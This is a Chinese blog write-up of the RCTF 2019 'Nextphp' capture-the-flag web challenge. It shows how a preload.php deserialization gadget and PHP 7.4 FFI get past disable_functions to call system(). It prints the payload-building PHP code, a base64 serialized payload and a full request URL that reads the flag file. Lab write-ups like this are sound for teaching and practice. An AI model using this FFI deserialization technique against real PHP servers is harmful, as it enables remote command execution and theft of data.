[RCTF 2019]Nextphp

最新推荐文章于 2023-02-22 00:35:26 发布
最新推荐文章于 2023-02-22 00:35:26 发布
阅读量825 收藏 1
点赞数 3
分类专栏: # ctf做题记录 php反序列化 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/116998001
版权

场景
在这里插入图片描述
源码就相当于一个一句话木马。肯定没这么简单,先看看phpinfo
disable_functions里禁掉了不少函数
在这里插入图片描述
刚开始想的是用file_put_contents函数写shell再用蚁剑插件绕过disable_functions,但测试后不行,不过也得到了一些有用的信息。

在这里插入图片描述
有个preload.php

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '1'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }

    public function __construct () {
        throw new \Exception('No implemented');
    }
}

应该是反序列化,这里源码很简单,构造反序列化后在a里面调用__get(‘ret’)可以输出我们的值,这里data[‘func’]和data[‘arg’]都是我们可控的。但问题是如何利用这个拿到flag。
在这里插入图片描述
构造反序列化

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => 'int system(char *command);'
    ];

    private function run () {
        echo "run<br>";
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }
    public function serialize () {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }

    public function __construct () {
        echo "__construct<br>";
    }
}

$a = new A();
echo base64_encode(serialize($a)); // 即payload
//QzoxOiJBIjo4OTp7YTozOntzOjM6InJldCI7TjtzOjQ6ImZ1bmMiO3M6OToiRkZJOjpjZGVmIjtzOjM6ImFyZyI7czoyNjoiaW50IHN5c3RlbShjaGFyICpjb21tYW5kKTsiO319

参考
参考这里因为无法直接回显,所以在vps上监听
在这里插入图片描述
这里还有一个更简便的方法是写入文件
?a=unserialize(base64_decode('QzoxOiJBIjo4OTp7YTozOntzOjM6InJldCI7TjtzOjQ6ImZ1bmMiO3M6OToiRkZJOjpjZGVmIjtzOjM6ImFyZyI7czoyNjoiaW50IHN5c3RlbShjaGFyICpjb21tYW5kKTsiO319'))->__serialize()['ret']->system('cat /flag>/var/www/html/1.txt');
这里将值直接写入了txt文件,打入后再访问这个txt文件。
在这里插入图片描述
拿到flag。

fmyyy1
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[wp] RCTF2019-nextphp
MercyLin的博客
09-11 1765
<?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 尝试利用eval ?a=echo system("ls"); system()函数被禁止了. 尝试查看phpinfo(); ?a=phpinfo(); 查看成功,在页面查找disable_function...
[RCTF 2019]Nextphp题解
blue_lotus_first的博客
09-21 1168
[RCTF 2019]NextPHP题解
RCTF2019-WEB-nextphp
river
05-31 1802
RCTF-web-nextphp <?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } http://192.168.1.8/?a=var_dump(scandir(getcwd())); http://192.168.1.8/?a=show_so...
[RCTF 2019]Nextphp(php7.4的FFI扩展安全问题)
m0_62422842的博客
12-14 662
这个FFI扩展最初是为了能够更方便的调用C语言的各种库而设计的,然而在不正确的使用下就会像该题这样,直接绕过php层的限制去执行命令。当然,个人觉得该扩展引发的安全问题也是比较好防护的。设置ffi.enable=preload参数选项,指定特定的php文件去调用FFI。总之,FFI扩展引发的问题也是需要了解的。
RCTF2020.zip
07-20
RCTF2020 比赛逆向 pwn等赛题,除web题外所有赛题均有
rctf:redpwn的CTF平台
03-28
rCTF是redpwnCTF的CTF平台。 它由 CTF团队开发和维护。 入门 要开始使用rCTF,请访问文档在 如果您需要有关rCTF的帮助,请加入并在#rctf-help频道中提问。 使用rCTF部署挑战 rCTF本身不处理挑战性部署。 (可选)...
RCTF_2015_web500.rar
09-30
【标题】"RCTF_2015_web500.rar" 指的可能是一个在2015年RCTF(Redbud Cybersecurity Technology Challenge)网络安全竞赛中的Web类题目,难度级别可能是500分,暗示这道题目相对复杂。这种竞赛通常涉及网络安全、...
Python库 | rctf-golf-1.0.0.tar.gz
03-10
本资源是一个名为“rctf-golf”的Python库,版本为1.0.0,封装在“rctf-golf-1.0.0.tar.gz”压缩包内。这个库可能是为了解决特定问题或提供某些功能而创建的,它通常包含一系列模块、脚本和文档,方便开发者在自己的...
php算法刷题网站,刷题[RCTF 2019]Nextphp
weixin_42364392的博客
04-14 296
解题思路打开发现,???,这么简单嘛,直接一句话写shellfile_put_contents('1.php','');蚁剑连接,???,就这?好吧,只有当前目录的权限,看preload.php,看着是反序列化了我懒,不想看序列化,不过感觉是都被禁了,没啥用bypass_diasble_function1.LD_PRELOADmail,putenv,error_log全被禁了,打扰了2.**Apa...
[RCTF 2019]Nextphp&&php预加载实现FFI
Je3Z的博客
09-12 418
参考 <?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 初看题目很简单,然后看了下phpinfo 过滤了挺多函数的,命令执行的都过滤了,然后还有open_basedir限制/var/www/html 然后可能会想一些绕过disable_function的姿势 1.LD_PRELOAD mail,putenv,error_log全被禁了 2.Apache Mod CGI
PHP next() 函数
冷月醉雪的博客
01-26 400
  参考: https://www.yuque.com/docs/share/68ca87e7-5b96-4040-b02c-b841ef757dca    
CTF中PHP知识点总结
river
06-09 723
https://www.restran.net/2016/09/26/php-security-notes/
RCTF-RCalc WP
qq_41252520的博客
07-28 607
保护 分析 IDA分析代码,部分函数名经过我的分析已被重置 这部分函数主要就是申请了两个,我称之为calc的结构,并给该结构中的buf成员申请空间。 这个函数很明显存在栈溢出,值得注意的是scanf("%s",v1)是以空格作为输入结束的标志,并且作者刻意实现了自定义的canary保护。在一开始随机一个数,存放在answer中,在尾部又从前面申请的calc结构中取出来进行对比 ...
RCTF-misc-coocat wp
qq_53755216的博客
09-15 517
coolcat writeup I am honored to give a misc challenge for RCTF( forgive me for my poor english plz The challenge comes from an article
PHP7.4 FFI 扩展安全问题
最新发布
weixin_63231007的博客
02-22 1310
PHP 7.4 FFI扩展 bypass disable_function&[RCTF] nextphp&geek2020 FighterFightsInvincibly
RCTF2021 ezshell
feng的博客
11-05 549
前言 RCTF当时没打,感觉还是错过了学习的机会。今天下午看firebasky师傅的github的时候偶然看到了RCTF的题目,所以打算找个时间把这个比赛的Web复现一下。就没有把所有的web题目都放一篇文章上,因为最近各种事情还有复习,复现题目也是断断续续了,可能接下来会过个好几天才继续看下一题,时间间隔拉的太久,而且每道题学到的东西也比较多,写的相对来说也比较详细,就单独拉出来成一篇文章了。 Writeup Misc里面的一道Web,get访问/shell之后可以得到源码反编译之后审计一下: // //
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1521
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值